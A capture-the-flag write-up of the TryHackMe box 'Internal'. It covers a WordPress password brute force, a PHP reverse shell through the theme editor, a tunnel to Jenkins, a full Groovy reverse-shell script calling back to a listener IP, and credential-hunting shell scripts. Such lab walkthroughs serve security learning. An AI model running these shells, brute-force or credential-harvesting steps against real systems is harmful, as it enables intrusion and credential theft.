WriteUP THM — Internal
Penetration Testing Challenge
This is a writeup for the TryHackMe room Internal.
To start with, remember to add the machine's IP address to /etc/hosts as internal.thm.
Reconnaissance
Start with nmap, scanning all TCP ports with default scripts and version detection:
nmap -sC -sV -p- internal.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-17 15:23 EEST
Nmap scan report for 10.10.151.253
Host is up (0.053s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Only SSH and HTTP are exposed, so enumerate the web server with gobuster:
gobuster dir -q -u http://10.10.151.253 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/blog (Status: 301)
/wordpress (Status: 301)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
Since there is a WordPress site on the box, run wpscan against it:
wpscan --url http://internal.thm/blog --api-token __REDACTED__
No vulnerabilities are found, so enumerate users instead:
wpscan --url http://internal.thm/blog -e u
This reveals a user called admin.
Gaining entry
Run a dictionary attack against that account with wpscan:
wpscan --url http://internal.thm/blog --usernames admin --passwords /usr/share/wordlists/rockyou.txt --max-threads 20
After 63 seconds the password is revealed to be __REDACTED__.
Log in to WordPress with that account. Because admin is an administrator, the theme editor (Appearance > Theme Editor) allows editing PHP files of the active theme: replace the contents of 404.php with php-reverse-shell.php (with your own IP and port filled in), start a listener, and browse to the file to trigger the shell:
http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php
Boom! Note that this path to code execution only exists because file editing is enabled; a site with DISALLOW_FILE_EDIT set to true in wp-config.php removes the editor entirely.
Privilege escalation
Upgrade TTY:
python -c 'import pty; pty.spawn("/bin/bash")'
Enumerate with linPEAS.
Databases
WordPress database credentials, as reported by linPEAS:
wp-config.php files found:
/var/www/html/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', '__REDACTED__' );
define( 'DB_HOST', 'localhost' );
phpMyAdmin credentials:
cat /etc/phpmyadmin/config-db.php
<?php
##
## database access settings in php format
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded. *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='phpmyadmin';
$dbpass='__REDACTED__';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';
MySQL database enumeration with the WordPress credentials:
mysql -u wordpress -p
use wordpress;
Database changed
select * from wp_users;
Only the admin user exists and we already know its password.
The phpmyadmin database holds nothing interesting, but the credentials from config-db.php do log in to the phpMyAdmin web interface at /phpmyadmin.
Users
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
....
aubreanna:x:1000:1000:aubreanna:/home/aubreanna:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
Sudo
Potentially exploitable depending on aubreanna's sudo rights.
Sudo version 1.8.21p2
Jenkins
Looking at services listening on localhost only (netstat -nat), I find a web server that nmap never saw:
curl http://127.0.0.1:8080
<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2F'/><script>window.location.replace('/login?from=%2F');</script></head><body style='background-color:white; color:white;'>
Authentication required
<!--
You are authenticated as: anonymous
Groups that you are in:

Permission you need to have (but didn't): hudson.model.Hudson.Read
 ... which is implied by: hudson.security.Permission.GenericRead
 ... which is implied by: hudson.model.Hudson.Administer
-->
</body></html>
This is Jenkins, bound to 127.0.0.1 only. Let's set up a reverse SSH tunnel so it can be attacked from the attack box. I'm using TryHackMe's browser-based attack machine here to protect my own system. The command below runs from the shell on the target: -N opens no remote shell, and -R makes port 8080 on the attack box (10.10.3.78 here) forward to the target's 127.0.0.1:8080. The process can be backgrounded after login.
ssh -N -R 8080:127.0.0.1:8080 root@10.10.3.78
Fire up Metasploit and run auxiliary/scanner/http/jenkins_login against the tunnelled port, with USERNAME set to admin and PASS_FILE set to rockyou.txt:
[+] 127.0.0.1:8000 - Login Successful: admin:__REDACTED__
Jenkins itself runs as the user jenkins, so running a Groovy reverse shell from the Script Console (Manage Jenkins > Script Console) gives a shell as that user. Set host and port to your listener:
String host="10.8.108.247";
int port=5555;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();
Looking at ps aux on the host, I notice that the container's processes show up as running under user aubreanna, most likely because the container's jenkins user and aubreanna share UID 1000 (see /etc/passwd above) and the host resolves that UID to her name. Nothing interesting turns up in the container so far, and after a lot of searching for a way to escape the container and land a shell as aubreanna I didn't find one, so back to enumeration.
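The UID observation above can be checked rather than guessed. The following is an added example and not part of the original writeup: from a shell on the host it ties the processes that ps aux shows under a user back to the Docker container they run in, by reading /proc/<pid>/cgroup. The PROC_ROOT variable and the sample /proc tree used in testing are additions so it can run against constructed input; on a real host leave PROC_ROOT at /proc.

```shell
# Added example, not part of the original writeup: map processes that ps aux
# shows under a user to the Docker container they belong to, using the cgroup
# path in /proc/<pid>/cgroup. Handles the cgroup v1 layout (".../docker/<id>")
# and the cgroup v2 layout ("/system.slice/docker-<id>.scope").
# PROC_ROOT is an assumption added so the functions can be pointed at a
# constructed fake /proc tree; on a real host leave it at the default.
: "${PROC_ROOT:=/proc}"

# container_id_of PID -> prints the 64-hex Docker container ID the process
# belongs to, or "host" if none of its cgroup lines mention docker.
# Returns 1 when /proc/PID/cgroup cannot be read (no such pid, or hidepid).
container_id_of() {
    local pid="$1" cg="$PROC_ROOT/$1/cgroup" id
    [ -r "$cg" ] || return 1
    id=$(grep -oE 'docker[-/][0-9a-f]{64}' "$cg" | head -n 1)
    id=${id#docker-}
    id=${id#docker/}
    if [ -n "$id" ]; then
        printf '%s\n' "$id"
    else
        printf 'host\n'
    fi
}

# list_container_procs UID -> one line "pid container_id comm" for every
# process whose real UID (first field of the Uid: line in /proc/PID/status)
# equals UID. On the host, run it with aubreanna's UID (1000 per /etc/passwd)
# to see which of "her" processes are really the Jenkins container.
list_container_procs() {
    local want="$1" d pid uid comm cid
    for d in "$PROC_ROOT"/[0-9]*; do
        [ -d "$d" ] || continue
        pid=${d##*/}
        uid=$(awk '/^Uid:/ { print $2; exit }' "$d/status" 2>/dev/null) || continue
        [ "$uid" = "$want" ] || continue
        comm=$(cat "$d/comm" 2>/dev/null) || comm="?"
        cid=$(container_id_of "$pid") || cid="unknown"
        printf '%s %s %s\n' "$pid" "$cid" "$comm"
    done
}

# Usage on the target: sh container_procs.sh 1000
if [ -n "${1:-}" ]; then list_container_procs "$1"; fi
```

Processes reported as "host" are genuinely aubreanna's own (an SSH session, for example), while a 64-character ID marks a process that only appears under her name because of the shared UID; the ID can be matched against docker ps if the Docker socket is reachable.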
Files
Trying various find and grep queries to turn up anything interesting:
find / -iname "*flag*" 2>/dev/null
find / -user aubreanna 2>/dev/null
grep -Ril "aubreanna" / 2>/dev/null
This finally lands me on a file with aubreanna's login:
cat /opt/wp-save.txt
Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.

aubreanna:__REDACTED__
grab user flag:
cat /home/aubreanna/user.txt
THM{__REDACTED__}
Root
After digging through the linPEAS findings for hours I don't find anything exploitable, so I go back to the Jenkins container to see if I missed anything there and repeat the same file searches I ran on the host:
find / -iname "*flag*" 2>/dev/null
find / -user aubreanna 2>/dev/null
grep -Ril "aubreanna" / 2>/dev/null
BOOM!
cat /opt/note.txt
Aubreanna,
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account.

root:__REDACTED__
Log in as root on the host (SSH is open, or su from aubreanna's shell) and grab the flag:
cat root.txt
THM{__REDACTED__}
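Both credential files in this box were found by the same three ad-hoc searches, run once on the host and once inside the container. As an added example (not part of the original writeup), here they are collected into one function that can be re-run on every new foothold. It reports text files that mention a target username, files owned by that user, and lines that look like credentials: wp-config.php DB_PASSWORD defines, dbconfig-common $dbpass assignments, and bare user:password lines of the kind found in wp-save.txt and note.txt. The optional ROOT argument and the sample directory tree used for testing are additions so it can run against constructed input; on a target, call it with just the username.

```shell
# Added example, not part of the original writeup: the find/grep searches
# from the Files and Root sections as one re-runnable credential hunt.

# Credential heuristics (grep -E). The user:password form deliberately rejects
# lines containing a second colon or a slash so /etc/passwd and URLs do not match.
CRED_PATTERN='DB_PASSWORD|\$dbpass[[:space:]]*=|^[A-Za-z0-9_.-]+:[^:/[:space:]]+$'

# hunt_creds USER [ROOT] -> lines tagged
#   mention:<file>                 text file whose content mentions USER
#   owner:<file>                   regular file owned by USER
#   cred:<file>:<lineno>:<line>    line matching CRED_PATTERN
# ROOT defaults to /; it is an addition so the function can be tested on a
# constructed tree.
hunt_creds() {
    local user="$1" root="${2:-/}" base files
    base=${root%/}     # empty string for /, so "$base/proc" becomes /proc
    # Regular files under ROOT, skipping pseudo-filesystems and anything >= 512 KiB.
    files=$(find "${base:-/}" \( -path "$base/proc" -o -path "$base/sys" \
              -o -path "$base/dev" -o -path "$base/run" \) -prune \
              -o -type f -size -512k -print 2>/dev/null) || true
    [ -n "$files" ] || return 0

    # 1. Files mentioning the user (case-insensitive; -I skips binaries).
    printf '%s\n' "$files" | xargs -d '\n' grep -IilH -- "$user" 2>/dev/null | sed 's/^/mention:/'
    # 2. Files owned by the user. find exits non-zero for an unknown user name,
    #    which is why its status is not checked here.
    find "${base:-/}" \( -path "$base/proc" -o -path "$base/sys" \
         -o -path "$base/dev" -o -path "$base/run" \) -prune \
         -o -type f -user "$user" -print 2>/dev/null | sed 's/^/owner:/'
    # 3. Credential-looking lines, with file name and line number.
    printf '%s\n' "$files" | xargs -d '\n' grep -IEnH -- "$CRED_PATTERN" 2>/dev/null | sed 's/^/cred:/'
}

# Usage on the target: sh hunt_creds.sh aubreanna
if [ -n "${1:-}" ]; then hunt_creds "$@"; fi
```

On the host this would have surfaced /opt/wp-save.txt under all three tags at once (it mentions Aubreanna, and its last line is a user:password pair), and inside the container /opt/note.txt under mention: and cred:, which is exactly the step the write-up took hours to reach by hand.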
That's all folks! What a great machine, with multiple services to explore and exploit. I spent hours looking for vulnerabilities and should have paid more attention to the file system.